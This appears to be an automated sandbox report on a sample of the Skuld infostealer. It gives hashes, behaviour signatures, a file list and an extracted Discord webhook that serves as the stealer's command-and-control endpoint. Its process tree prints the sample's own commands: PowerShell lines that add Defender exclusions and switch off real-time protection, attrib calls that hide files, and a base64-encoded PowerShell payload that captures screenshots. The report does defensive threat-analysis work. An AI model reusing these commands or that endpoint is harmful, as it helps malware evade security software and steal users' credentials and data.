Analysis

  • max time kernel
    72s
  • max time network
    68s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-10-2024 02:40

General

  • Target

    skuld.exe

  • Size

    9.8MB

  • MD5

    6cbfaf66c25b2255b6f28e12915c774d

  • SHA1

    11caa7a9f6bbfa96fba46aec5161db44b9e18961

  • SHA256

    9a567e4744768e1e1acfd90020843a40d22ed677187459f34c7c77b0db5db508

  • SHA512

    7ce5c70e5c9344da2b788a7d1a410883afdbe28b3ef17c4dd509baf0071ccc72e27407bce88ae91fe40316097e9a70e08c1a24e132d237dea2f5d5716ada7c36

  • SSDEEP

    98304:xdQrygchMRKooE0qqWdS5ELg3ZKEGTiBJZrZ6f/fLhQcR:xKMhMR4Nb5ELgJXPO/fLT

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1296301282251903037/WshT7A7pEu0AhyXLLTc0qGgKZbqZAIGAaYjzCFnVn9Q2bLinclJ4010EZGBBtfZKzDlG

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Views/modifies file attributes
      PID:2864
    • C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1316
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:1960
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\llyihlrr\llyihlrr.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C8E.tmp" "c:\Users\Admin\AppData\Local\Temp\llyihlrr\CSC559FB5138E849B698B896F0A09C96F.TMP"
          4⤵
            PID:3516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1964
      • C:\Windows\system32\attrib.exe
        attrib -r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:4780
      • C:\Windows\system32\attrib.exe
        attrib +r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:1180

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2e8eb51096d6f6781456fef7df731d97

      SHA1

      ec2aaf851a618fb43c3d040a13a71997c25bda43

      SHA256

      96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

      SHA512

      0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      dc146cc17361f9d4665df9d16d5938dd

      SHA1

      09ba711a763256553cfcffeabb317447d974ad96

      SHA256

      290b8f16cb9f7614241b399edc7595abb1bad9c22c54c1e78ea7f9f1ab625419

      SHA512

      57e2b42512debb5b02eebb59221ea6d4e66efbce7b0555b7a3fde8e1ca0e76c7e284ffbb365e0ceff6b61aac31c82023824e94573087aaea8cf4906404f265b1

    • C:\Users\Admin\AppData\Local\Temp\RES9C8E.tmp

      Filesize

      1KB

      MD5

      4ccff53e77c62e3298fb7bf2917d7777

      SHA1

      c92971eade22cde2adda5c0f7958f64d5792ffc0

      SHA256

      61f043fb92fd6538a6cf1fff09751ad184a7982d0c309f5716dfc904988832ad

      SHA512

      7f584317705ccc13811da84e6708286bc358c063061ba1884107e178cdaa2460fd141755f366eff69223c7df55a585d8f34e51f97af336557cab9ff8d4aa74ef

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ohaul0ik.n3t.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\llyihlrr\llyihlrr.dll

      Filesize

      4KB

      MD5

      a931fd7b463797eea85900c538b32c06

      SHA1

      26deed9431523b770d9d7e056ab218e4b2c945c4

      SHA256

      3e9935e43d5dd544df3845af64e22e93609db952b8767fd38fd0b486cb5fbcf6

      SHA512

      5fe7d98ea554fea33bd351a2864e2ef3187aff4e99afc5146f730364e6c43b45cfd697719e15b2430ce59944b517215a69555024619f52eed3c0868118593b12

    • C:\Users\Admin\AppData\Local\Temp\yXO0EbXM2h\Display (1).png

      Filesize

      420KB

      MD5

      893b7ac6446c19d44dd64f6a2ef38f39

      SHA1

      ffffec594c78a5f0b2600f3ebaea7870387fec54

      SHA256

      b181902d76182020cf712ff1610699a418798b9e925a6ff66c39f32d01fb5966

      SHA512

      d15faf8c9a73b898dbdf44aca99ec4609ea0f7f946f3266d3549db0a151b8133044685393a18256a3ec912f45dd83371e920ef21aa9e72eb8fc692f9e597792c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

      Filesize

      9.8MB

      MD5

      6cbfaf66c25b2255b6f28e12915c774d

      SHA1

      11caa7a9f6bbfa96fba46aec5161db44b9e18961

      SHA256

      9a567e4744768e1e1acfd90020843a40d22ed677187459f34c7c77b0db5db508

      SHA512

      7ce5c70e5c9344da2b788a7d1a410883afdbe28b3ef17c4dd509baf0071ccc72e27407bce88ae91fe40316097e9a70e08c1a24e132d237dea2f5d5716ada7c36

    • C:\Windows\System32\drivers\etc\hosts

      Filesize

      2KB

      MD5

      6e2386469072b80f18d5722d07afdc0b

      SHA1

      032d13e364833d7276fcab8a5b2759e79182880f

      SHA256

      ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

      SHA512

      e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

    • \??\c:\Users\Admin\AppData\Local\Temp\llyihlrr\CSC559FB5138E849B698B896F0A09C96F.TMP

      Filesize

      652B

      MD5

      d7a87613602f776b5d3a50f3ce0279ac

      SHA1

      38c9eca232b0335245f5c060f6340a6913ded1db

      SHA256

      be8a174570c2dba2aeb4684e011fdb3b9263065621c013293649648c65577381

      SHA512

      e817a410591da1fd0d16f39574ef3fa9c7c6b882fb77d775ab28ad0cf0f5220ada361f0c489f035c31205ee1ad6697096f247c648fbcb64a32c2d691aa526635

    • \??\c:\Users\Admin\AppData\Local\Temp\llyihlrr\llyihlrr.0.cs

      Filesize

      1004B

      MD5

      c76055a0388b713a1eabe16130684dc3

      SHA1

      ee11e84cf41d8a43340f7102e17660072906c402

      SHA256

      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

      SHA512

      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

    • \??\c:\Users\Admin\AppData\Local\Temp\llyihlrr\llyihlrr.cmdline

      Filesize

      607B

      MD5

      463bf5c6c8a40cc77f5a26a485396ce3

      SHA1

      918fd4a95bc1966dd98db4717cece22736ae1639

      SHA256

      fd700eafa69e840efd133bb71ed31d623902933c2062402d89ebb82c464d9d87

      SHA512

      b7f39591b18ec8ae4a20c7327906927b6fff1bdb89fca3d1371abf152400a65537eca460a5941d0c0a067492d949ca7346a7dc3e908b45f0ae0752729154bb96

    • memory/1316-0-0x00007FFC3A533000-0x00007FFC3A535000-memory.dmp

      Filesize

      8KB

    • memory/1316-33-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

      Filesize

      10.8MB

    • memory/1316-15-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

      Filesize

      10.8MB

    • memory/1316-14-0x00007FFC3A530000-0x00007FFC3AFF2000-memory.dmp

      Filesize

      10.8MB

    • memory/1316-12-0x00000255F85A0000-0x00000255F85C2000-memory.dmp

      Filesize

      136KB

    • memory/1624-53-0x0000018EF7890000-0x0000018EF7898000-memory.dmp

      Filesize

      32KB